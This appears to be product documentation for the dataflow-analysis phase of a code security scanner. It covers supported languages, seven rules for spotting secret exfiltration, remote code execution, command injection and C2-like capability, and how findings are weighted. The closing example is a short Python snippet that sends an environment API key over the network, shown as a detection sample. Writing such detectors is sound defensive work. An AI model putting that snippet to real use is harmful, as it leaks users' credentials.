Pipeline · Phase 4

Behavioural Analysis — source → sink dataflow.

Phase 4 parses the file (Babel AST for JS/TS, regex extractors for the rest) and tracks how data flows from sources (env vars, file reads, network responses) to sinks (network sends, command exec, eval). Catches what regex misses — like a secret read in one statement that's exfiltrated in another.

PropertyValue
Latency<200ms
ScopeWrite / Edit · 6 languages
EngineBehaviouralAnalyser · 7 dataflow rules
Score weightscoring_weights.behavioural — default 2.0 (heaviest)
Short-circuitany CRITICAL finding → deny immediately

Languages

LanguageParserExtensions
JavaScript / TypeScriptBabel AST.js .ts .jsx .tsx .mjs .cjs
PythonRegex.py .pyw
ShellRegex.sh .bash .zsh .fish .ksh
RubyRegex.rb .rake .gemspec
PHPRegex.php .phtml
GoRegex.go

The 7 dataflow rules

RuleSeverityDetection
DATAFLOW_EXFILCRITSecret or credential flows to a network sink
DATAFLOW_RCECRITNetwork response flows to eval / exec
DATAFLOW_CMD_INJECTHIGHUser input flows to a command execution sink
DATAFLOW_EVALHIGHData flows to eval / Function constructor
CAPABILITY_C2HIGHSkill/file has both exec + network capabilities
CAPABILITY_EVALHIGHSkill/file uses dynamic code evaluation
CROSS_FILE_FLOWMEDData crosses file boundaries

Why it's the heaviest weight

Dataflow tracking has very low false-positive rates compared to regex — a match means there's actually a path from a sensitive source to a dangerous sink in the parsed AST. That's why scoring_weights.behavioural defaults to 2.0 (vs 1.0 for runtime/static/llm). Turn it down only if you trust your code reviewers more than the analyser.

Example

# leak.py
key = os.environ["API_KEY"]              # source
requests.post(url, data=key)             # sink

DATAFLOW_EXFIL · 0.88